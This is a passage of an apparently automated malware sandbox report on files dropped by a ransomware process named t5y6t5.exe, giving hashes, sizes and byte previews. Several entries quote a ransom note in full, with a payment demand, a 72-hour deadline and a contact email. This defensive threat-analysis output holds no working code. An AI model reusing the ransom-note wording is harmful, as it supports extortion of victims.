                                                                                            SSDEEP:192:r9f8jx5TAqtgqM9MFAo1yBOXzrPUg7iNxdDc0:8TAqtgqrFAo1yBOHUxxn
                                                                                            MD5:339F72F932EAA3759B8D409C8FABD817
                                                                                            SHA1:9834C79CC88BA5805662D2472A58313FEFFE558C
                                                                                            SHA-256:216AB6A7AE25B858BEEF9F45E5B1C61A9548311E3F656E158BB6554078BCE3DC
                                                                                            SHA-512:2CDEC22373D28644A6AE76F5F2690A5F8C70377B975490BA709DC7DBF109A77422BBD9704B645875733CDD62FF98AE622FCD974A06993ADDA67EE902CA201589
                                                                                            Malicious:true
                                                                                            Preview:....pC.(.Z,.;...^&....1.0F.Upc..^0.Q.N.n.....z....J......p..P......B._.....q.X..3.nd7.nt...../..[.O.7.$o..TT.DM....-...2.....axs..Z...C.;s..w._._4..........f...F...^....)U|..uf9.....Mb.@....;k'GP.j.Z...G;.V...).;'.B0..2.....7tU... .U6A.hE....$.....q8#N8.(..V.U[.^.5.V..._.qh_2>C%...^.D.X.. WU...........h".....?.r#.kN.`..])..2......R7.=.Y.t.g...&P....=L.wq32i.vd.'.l..N.=......d.jC..1k..&.lj.Q..EAfV..T$P....Vh..3.......{.h.Z.....q.R=.6^:...,3.V.\......-W.`..f...Z.@.}.........`#/..F{#}...Au...zcb5.8\..8...)h..O$wu..c.G...(.mH.HVn.j..TX.n..p}S>P...I....b....K.}......8N....-..2.:....ip..".}....f1...9'..x.m...s..w.]#...ft...d.t<.Nb..n.a"..T<l..Y. v.2....`.|..Q9e...........g.l.O.`.\..0. .a. ....);..&.+..j....| ..f...K..F..m.C....l.....m..P..R.8...x..o. ..._.^.(.w~..]...y....T.z._.... l...X*.O...C...n........77.......:..i..*..&\.+..b...1Do.'J.....a.&:.K...=..g....]A\.#.......qX[..4.....qL{.G.;B.DF...87...f.6......~.-C..GM.i..G^....Q.<%......W..n.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.603976591661092
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:jSt+rhtcxLaTeWriE3jirp2Y4qxFnsBOzX5b4D4qK4nKzMRR5kJ:8+rrMaTbWKAp2tqTsEx8FvKzWkJ
                                                                                            MD5:BE89EDD43FEC4E13E78C94C548798B5B
                                                                                            SHA1:A9D8E263FB536453FBD3E745DBE2E0BD506AD50C
                                                                                            SHA-256:70748A991ADB9435797ACC7A87B1C10BAEF90F565843867F58EADFE06877D7B3
                                                                                            SHA-512:94C54E7C1A87681EC25CCFB9E91EE083FE39EB8A2E4F1B55645A6A91711FAE8719F183CCACE2E248B654CC5D81E4122B9E4F0AFB47B392E008B8BC49E363E330
                                                                                            Malicious:true
                                                                                            Preview:}D.....k....i&.i.J..b%.ha)B^.....:8.......@....1.d.G&W...v]....=..............t.....]`&$.....q.Y.=..#.voH..<-.[.x..$.0N.mZ.G....M..N.}.H}.a.uG... /..:..~[.4..t..:......L~...}.......[.....?j.8.L..6.0.F.Z.hr.)-Qz..c..Uy:uF.<..@9..)RD...;..5....[J.=.Y..d.Q?....2..w.m..b.q#..$.F[z..W.d....J...g+b....^H...&~l.......i.'...(.s......@Ls`3..kc.e. Ct...7s$......i<.....j....y.AX".....m.\.K.= ..r.,:....(T...|..0?;')Z...^..8cGW.+....r..O...Q.+.O...=F9......h...L..TC.TB.k....Z2.(..Em..Z&2..<.$..66...J.7.f.k..xpV.;c.`..T.....g.....b..K..c6.?...V.#.J..6.-!...../.!.HA..l...D....q..77L*....D..\.].UBN.....V.o..q...P.....R..8|tt...y.^.Gv....6 @g...(...0.@..$PeW..7.a./.a3.ubm......3'....H.9a....e...Re...e.m...<.g...=H.~....V*g..R.N....@..]&/1...~C..oo..]V.DT/(._...s...IW...'..........#F....Ql....Uh..\.........3.c.j.....{.V..Ls....F...g{..-...>.i>T...W.L..~I.-..-....d.Ds...:`.......L......,y.k.-.e........0..tX...v...%..h.v..I.]C`!.m.+.$eI..q...f|.G....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.161341576030226
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:gDPVOkWV/9+gW98SEpS2LoBnDJUFyEIv5Om/2WzvObswl8WCL7kyn:gDP4kWV/9+gO9EpS2LcnDJUFyEIv5zzB
                                                                                            MD5:8C327C81A82CC600C90F6C0B9FB97038
                                                                                            SHA1:27DC61DA7E66F76E809A4E4EC1660E6616FA4371
                                                                                            SHA-256:3AFEFC9B61E8E93D8AB512323C8CBE405D4CBE3EC27E2EB659EA911A5132A533
                                                                                            SHA-512:CB8C985EDF3C2189CAA1AC4FD2A42EBC2A2C69E3A51506DEF0BF3DD9B906746B7F4C677E2034FAFA5329AF92C0FB565AE34F99CD72866C1B47E7A0330A80347B
                                                                                            Malicious:true
                                                                                            Preview:M7g...|.BO.0p............6u.6..0..3A..%.3@1..+.x.%.x\!..3.Y.*.>[.........m8..4_..`.{s!..l..<k.. ..!S.?.';....q..........-.&.I...g.'..\@....h..#..:...2g.F,.z.lx\S.7}m.r..{8x...GrC.~..?.([..s..5...XXE...h......m....$.....6...M..v...s....s..BmK...3.3.0.......O.f.f-..:..Rk.[30xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1575593552515953
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:P5KcoYmcawNA3w3BAp0rUNoc9R5EgS9AJdn/kI4/Ve0Mca5z1KQw:hW4wcab+wED9AJdnB44R5z0Qw
                                                                                            MD5:9285F455B7E5F20396D99CC4D39143AF
                                                                                            SHA1:215DF2CE5CE857D9E09D05A55EFC9665CDE06205
                                                                                            SHA-256:DEBDBF6F73158D811F620DD1AD2FDBE6FD2E254BB99A6A0E4598CA3AD02AADE8
                                                                                            SHA-512:93B1485B7A0D949763393842E05472211D896EC9C9DC65A6BB3F9F66384850C30F19D9C2DFE67A45452BE5D04243CC43078211ED9E3D7325FD7501D71AD8C85B
                                                                                            Malicious:true
                                                                                            Preview:3."...0..d|9..v..a.ia~..).1....wf.."U.)....e...(.[z.o3b3vL.0J.~.....Z.....i.])x>..,%...N.:4...c.{..(.a;.....v)ZE...q.........G..|})....$w....iL...A..p....y.&.....]....K..R....\+.. .Y..k..y.i...U.aUN4.C...|..LY..F/...y..?.G.....8..5..j..&...q.?}"."...r...Jh..j..x.:T..^5+.m.!z..\.%u.!.Q....).?D*...(c.w.2$.8.}.\d.;..A~...A.8aD...al.=.<......H....p.6.A<..Y..5..}..D..2.0G.7..s....n..A..S>..z.}n.tT.....B....I.}.....p..._.........-8..6.....Q....G..(.c.Gx"!..r.M8.d..=>s8+.}...76.g..O..W-.?hOy.zB.......{R...a..I..Q)M....d.EE.O..j.;...r&2U...q.<.._.'..o*M.....U..1.I."...2.@..S..e..rQ..*=.*..A~H...Z.|.a..........*...^...[6t...[......Z......)....{...........$..[]......K..@.S ..z.!.....6...D..=.=......v.ijW....Ce......oqL,..Ft.....av.-.~[.:.....%..&.@.\.]JX.a.p.,^...6Q...W=...6...|.......Wc.w.x.5.R.....)V.....s...Pj...u..)d9[kD.P.r?.Q...>.F....e..F..[8$.j.q.A....1.A...1..JRVB...........\.Z.@bz...ox.7....AiV.Ro..A$....pt......\......p.oR.e.p.....6W
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6058081964739512
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:JG0Wx2hX2Hb8dFai5HpnrNy/nJaoOFKkpLF+xO3E4cTr+8+JqLArpJ9/sQa:JGR28ov5JnwnU9okpLFE77+1Trl/da
                                                                                            MD5:25DD9FF7567B5EA44D19F7FDF7F08AFB
                                                                                            SHA1:6C57273D9B8D919F68C832C103730AB8FFCA9A38
                                                                                            SHA-256:3A7116719296790D95715810B3A9335BD9BE1B06BC872312B01EB5713B74B74C
                                                                                            SHA-512:BC16F783A8D466B8BC5AD50740FF1F134F57CA56C849712AD9F07FFB39D97E1AE19CF434F971F5C7B2FF2DD758DAA4CDFC4413A24F870F02728C90CAE8C6524B
                                                                                            Malicious:true
                                                                                            Preview:.<..'..X..S.s.y.........l...+.v?..yf.?.3......2.Xj..R..{..].Rh......w...[..D$.H.8I.{..@BprO.g...J9.....N.i...e.Y)P 6.EeZ.Q.f.......eL...Mo..L....3li.D....>/.+.U.......H...._+...4....*[3..n..tbL./.1.DvN......a.;...d.$d...@....R.......CU@...\+4.(|.......<..\o.....(....eH.Xu.7.q!.d..P..6<....R...N1..i..X$..`\bN..^.....mn.....n{p[...-R..h..[...@i.hD.....#.....z.e ?..e.@~.DN.7..N..R..kr.r\."))..8;...]..:..u.C.......A.`k.}.k..<+.Vv.<....c..@.476....+q.Y</......<O++Z...%....r.s.M.Q.....y..kJ{.8.N.&.......,...tx4u.i...n......+'^..}.J,....H.v.i*K.......]Ro.:..M...Z....1.;...d.<....n.....*....o...1.C._..((.ZI3.....=\_.*.O...E...B..5.:...,$.....8........"...j...B.kZWps. lW...#48G..!..eI......F/_b|.t...j....`..6eR....9.o.........Itn...mF. .(..9.,...........+......a..u..4..b.....c.W..?.......9"!Y ..v...T....yc..]......d....-pn.C.[|d..+.;..M...5.d..n..B.......2uM..H..5..#rg.;.....?..<..h....|.Kx.I...AD...~|c.\.d^....?eN.....9.A.....*.>.3.B9.8...{
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.182542358856745
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HFrXMyxCRl8HKAM/r/gJHO28EtZUlbKVCs8TWs4sXXCkdmn:WyG8HKAW/MHwM6luos8TWshikwn
                                                                                            MD5:82C3F853B9740D3A268DA972389595CA
                                                                                            SHA1:6BC99D7A68E695DD2760E56AB3E8B2E190115432
                                                                                            SHA-256:6A5E7D01B0E51208BB6BF92D0F98C06313E1EB1A64009664B9080EB4A54D43D4
                                                                                            SHA-512:6C24E065E940941C65F3EF3E2DB633587C54A64B43D945123FB6A13A7975B3973A48A4182C6329CB51BB5D18CC70A6AC66F212921FB30C52D3B9438655A2AC3B
                                                                                            Malicious:true
                                                                                            Preview:._/Bo.NI3'*9.................fb.q..1T.TeJ.._d.VS....w.@dND.^_...9E...?...k.I...".F.XD....'+XG"+.J.y9Y.. f...i...,.R...+.u....W.9+.....j...CI{...C_.t!..N...U......3A.[...0C.+.e..b....G$<...`Q._....fH?o[.6'.>..Dg..sb..v..0.W.Mc=..=....6..".^....e....;!.1.5).I...'..O0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):540938
                                                                                            Entropy (8bit):4.18574282768232
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:Xv5ocEznpqziziEwqsX2YkGE/f2RaD09Cw/o7k:Xv+cEyiziEwqsG2HRaD0xgk
                                                                                            MD5:8793E052C1E2E23DA96C24ECA4B9BD44
                                                                                            SHA1:820523F414119B2FD23721B05EE57A2D87874ADF
                                                                                            SHA-256:8068FC72004E84888CF2FA7C148FAAC54C38D4B72904DAF7343DF13F2566BC38
                                                                                            SHA-512:48492CF4E29A6E82AD04FC4DAF66B00202954C494F0819A686C5DFD560D2F8EC9CA7DE3E6BDB467EF472B83FB30DED49BAE22EFFA6CF96E873CE64FD0E09BD11
                                                                                            Malicious:true
                                                                                            Preview:.`..4TH.9...pA...D..Bek...L2..{vI*...O7.XU?....9...q.iV,.D.t.. ...UY....d..w.\z... x...#u....F..F.....}.)Kg.<.FS...x.,Y...iD4NCc...a.....(g..6U..{....#".;Oj....=..0....-.......By,S....knV.-U...&...${....>.O.kx.....P.e.$...>+ZP.c.g.6&...[.....2..{..6Ue..^vn.ln.....L..Ab........'N.>(...+V4.*v.....]Wdq..B...B9..8..8..Jm......E..).i....k<...S=|......gv....g.......W..i.fw..r0M...R...'.z.K..UN..!h%..../.. .Fu.-..J1....Z.'.dZ..B..*^.L:.V....|O...]...J.=...8.v.M%..a..L.5.w.JpV<...9.2.u..........$oA..{..yc.Z.09...r.I|L...=.m;F.x.a\..3......O..>.0..q.^..XwJ..w..a4...xzC.o.Y.?.2....N.C'....HtC.b...}..V..=...4:iq.t.......A......I.p...m.........J~.(.@.S..fpV...Z...e.u....sv...l..m{|......}tZW+M7....M.#cR.P.....yq..].8.c.T..0^.HB.B&....a.`.....P.`.?Gf%.....p..|..c3.{..][J../z.H..I.....[... .{C...H....FM.FK..q .#...i(...#..fGC.n.<.m..=.Ey..n../....=..oaP'.{.k8l.....%.D{..i+..y8h...S..U......h).......Gv4.~.fx.z..?].](J..?.~5y.!zp....l.x..c..:.DY"f.Vr<..-
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6534614961744027
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:VBvOg1ZD4lR/xYZUgrphzCIywYqyHmFPzT1QKUyksYf7n+GWob0cUYg:XZDyZenrph+ImnmFbT1ndkVf/Dg
                                                                                            MD5:39851195DC3634DBCF868B0240AB4001
                                                                                            SHA1:62DA2566B0D395E668230EA1A15F7D77D5E7CE88
                                                                                            SHA-256:6EA668E2728938790EC6C5AC8534EDB28CE1112C4C9F08BA1125A11D9D601486
                                                                                            SHA-512:2217F942883E463184378CF0421392B91AEB5E9B36679E79D6D2FEC62A9E1D021236E0EDBEABF619E8F8E5069AE0F2DC3AFBC6C0F3F9CC1DB2A2B35E64D59397
                                                                                            Malicious:true
                                                                                            Preview:]..u.<4...0PF.....6....6.U.9.M.<O.b.....u....S....A.z.?q.T.M1+p^....o)L..O0.O. .jE.@?{.0...a.k.Y...+.1......{ix.i..Z...O7L.V.\.>...yTI.!N.L.5.X.B.3....F....ij...*.n=f...M....f...q....,...]o...Nmx.M..%X.v^...*->.9....<...m.K#......v.e...e......nQ3-.c...ja.....$.k..~$#..v..........'$.'.+..Z.....*.....Jm..?...Y.....nv8.../..s.....G.uG;....A+..V.z...olD...i.;!~.{^Bn.>.^s.-... ../&.|...m.......4.c..._....!GpUP.../..M+O.N{..&.....j..%..>;.*..u....d.....<.......hw..<..7./%..2....#.....;O.8..........v.2...k...y..{.1+#...-.l..0.o.^iC.BF..I....H\.....^.g.k3*.*....+.....{...L.s.L.|7_.{.e.(."LK...}...V....._yH..g4....:#..q....+F..g2....+.z.9...{.[~>%....=...;.}jzH.n...i.65.A.S...8i..}lh.V.....;3...\..?b.......r..c..J...t'.Y...}f.Y..cF...v..u....1...Q}.....m;f.>g.1.......&.{..R].W.y.`.:[x.a.`...D......A.G.@._X..fX..,.!......}..8I.......d.o".p!..B{...(..R.7.q...#L.......(.:Kb..y.^..g........+-.`.v.&1ppG.{.:..k....r.......l.8..(>.ujx9...R_@n#.n
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.131304247491979
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ihxWNN4KkxAoy5RPy6usbOlWg7lG6obATYO3LecFQt43boUHn:WWNN4KQPGPOZlWgh91YqLeqQt4LJn
                                                                                            MD5:B19D77572DA45818FB6C25D439A363D4
                                                                                            SHA1:1026D468931D1A4F327EF18CABE1D72AA7CE8683
                                                                                            SHA-256:088053BA9C1C1A8DFDC55D28D5ADF321C695FE2F6CE05705D51DF93D6C214143
                                                                                            SHA-512:B2DEBCAB1967966BBFBC705201606281457CC7F78E8232411459DBE12375D19DA76318C81FEA5C5AE5F9CA378937BEA0C1CB59D3E434380DBA6895118A46F92C
                                                                                            Malicious:true
                                                                                            Preview:k(...|]6..v.............{.4.Q.%.&m.AM..e.....b.....<.[".K..A<{}{.b|Q..?....~.&.va.....J....c.r.m4.YPj..........."%.+...?...W.N......A.J[x...`.../uf.....{.......g...........s:..mK... .C..{.%.6(...|..,g6n..r....#...s.]..h._.Hw.!.,y..Q...c....Cy.e{.....h....@(o#....M..*.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4679
                                                                                            Entropy (8bit):7.933036931021872
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:rtmDJxG5s7wNefgonO3F09rWjtFex/2QNT2RZVDI1WzMcn2q2QgbOm:reoW8UuGEK/2QNTfWtrgbb
                                                                                            MD5:54310A7390D14D2623FC41150137C43B
                                                                                            SHA1:6C516D5B10ED8CCBB465A3966284FA0EC800ABB2
                                                                                            SHA-256:AF277747C9834DAC4D684B608D5F5F5F5191C6484C533C383A3FF271A28953C4
                                                                                            SHA-512:3858A3FC2D2D06A877FECEDD506E9224582FB1C4E16511C0403453B7E3E663F16F1774CBADE60D16123ECEE7063114CD640B2706C586AAA0F81C3B3692CA122E
                                                                                            Malicious:true
                                                                                            Preview:r.kW>.w+O..r.;.V.n...........{..1../HE`5.}. .u\*....c..O.&.^`7k.VT...zpb.@..Gu|.l.8.......+.)..}.v75....?.).?6.?.....>M...f*............|..3..s..8...ue.T.aT.;....."fJv.WF...H`U.J.......,....G]_...g.>[..d.....J.S..QN.,...9...U..P.S.`p..g....?6x`...=...@Y..@.E......6.n.n....j..".....>.6%D...H.,.m..dm..9..g..9..YG.<..?WX....l6y>.u/(..x..4.Z..2.....//......ww..4b.......t9:...G....k..0=..V.?..R{.S.-K.a.o.n...n=../....^.z...M..J.8.FB+.xG9b.6A.o.........T.4.=.......w..d.._..,.?..{.?.Z:Z.N ]$..H}..>...Z......]....&.N<....+..v..cJ.....T(.......rX..B.~...$z...{.b...U<..$..vC@......E..Ik.9}.........9]<.y#..)...^E..V/G.1..=7.t.=.Yo.b....Vs6.8.O.K.......r...G......yZ.b.b.?%..D.^.)........m..EuB,yN-'..aUh.C.mj..S.(W..2.@'.....D.f...%..(f"&k6O...Te...Z...ay1.<m..M[&...N....%..7o;..\...Y.S.....~...%.]@2.=.l..(...K..Vl.!\........N......{.......u*.Z.?.sg/.6.T.6.1..4.h..QK....&...z...E...\8:z*dO...w......X...{....E..kc-.6.GO9.I..F.c.5j.....K.....-....].....T
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):316
                                                                                            Entropy (8bit):7.27578595069255
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:xAlC0NZUOim4iAI6VBACuRM0UW+IzWeES1NpmIQbJ4pdHWHvJxNIY8/61pxdn:GpPNAI+BATK+fES3LQbJkMsR/2pfn
                                                                                            MD5:6DEDBC93C87A663AA27CACC12E1C4A0E
                                                                                            SHA1:B1CAC91EDA7FD2ECFA93FE481AAD1B2488B4E147
                                                                                            SHA-256:01368CF9E68B404ECC3A251EC41818381A75933AA69BACFB65903EC88BA53571
                                                                                            SHA-512:B0FD786F87599241303DABB3547893AFB3841360D2EC09502D399F72478A93AAA0A7B10B9D027EFD0E229797CCC590F8FFCAAD7FB08CBC4B9F8D984A5297A674
                                                                                            Malicious:false
                                                                                            Preview:.503e....*...&.~y....a -..7..4.....6...z{#.<@f6}'.}...8.....%.\K....+.....^xN._+.G..F#p.<.=Hg...U[..P#..:7.....?w..<..sD....hx..`.d.....z...b...!2HR(j.=O~.!..C^U..h.Q..\O.D...p..p.~:......R.9....(......>...9...ko.l........t.O.gS.....R..K...d.......+..n....@..20......|..8....Al..[.HR.v..9...0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:Java serialization data
                                                                                            Category:dropped
                                                                                            Size (bytes):98570
                                                                                            Entropy (8bit):0.6452078167260621
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:A9sQXllXsIRTIhJFgeKVGrPxSvlRVJa4O3Ke+SV8sn4EbOC7P:APVlpIhLgeKIsvW4Gx3bOC7P
                                                                                            MD5:63EC357B9E07458AC8A3E04FA8A18BC7
                                                                                            SHA1:81CAC9A82269F1209CEE92AC41F0A465FD202682
                                                                                            SHA-256:C9C5423FAAEDB10D284BAE74C6810311E2B5DF064BC72AE998E9162AB70CF076
                                                                                            SHA-512:B7A05FDA8239232DBD2D943405F91961CC0C4EC78592DE16F00B66E55E66E718FBFA1BC9B30DADAA6ED130C611A80B3C9B7E41F8F2B521BEEAA89BB972FDD846
                                                                                            Malicious:true
                                                                                            Preview:..O....S...W....... ..v..).......@..|.iXR.qcd.A....u.+.h.EX...b...[%%_@.l.z#...O....W...UI...p..Zp.9Rv;..).B.+.Xz..a.c1.........r.-...]....._..4G..o..A+.....E.]8...R.....h<\.0d..H .n..&.....c.2.=P...x....9z...i.1%.c*.w..s4:.49@....&5..v..x..ac.gb.'.g...SPk..gq......|X...y$.g..>.0.".8.!.,._Q.l...,(....P.."l..d6...b....xpDY.T..........g.&...........HF..PK.Cn..........!y.s..7..Q...P..#X..A......A....Lu%.C..Xv.........rk..........m.T....:....u..`%?..}....sh.)..N+Y.{%.)..E.....7..).Sp.u..B..k/D].........j.R..9.(.@$qN.0....V.1..q{...c/uS...0..K...<<.1...R...D.9...Z.v......*,........2..k.....".o..2......'w.@.}..l...Q.|>.....t.^R.|y.<....de.k.....ZH..K.eh}...mo....d.p.....E.r;>...m......5.K._-3)..,..M..=.67..E.h..wO...?.HaX.q.x2..4>..U..i.........Z.u{....;.[...UPL....."..E"...+.|.L..fI.......Q....5S.PB.@).o$..%.....u.9c.{q...)...DK[...|.%..M..%Sx`..?M.S.|...........hb....!.....2..f.....F..S.,....ci{.S..u./...r:......c.M/..=<0L.A.*%...>.7.j=
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.606117917085958
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:FocJuLzQXGeuU4Z5XSU7YsNbARJSa49YQIKTFwepd5:FWXuG4QFSU7Px3jxXpwepd5
                                                                                            MD5:424FDC1995E498438A41739393431C2C
                                                                                            SHA1:32710D511319D516EE5862967AE4BCA410AE4750
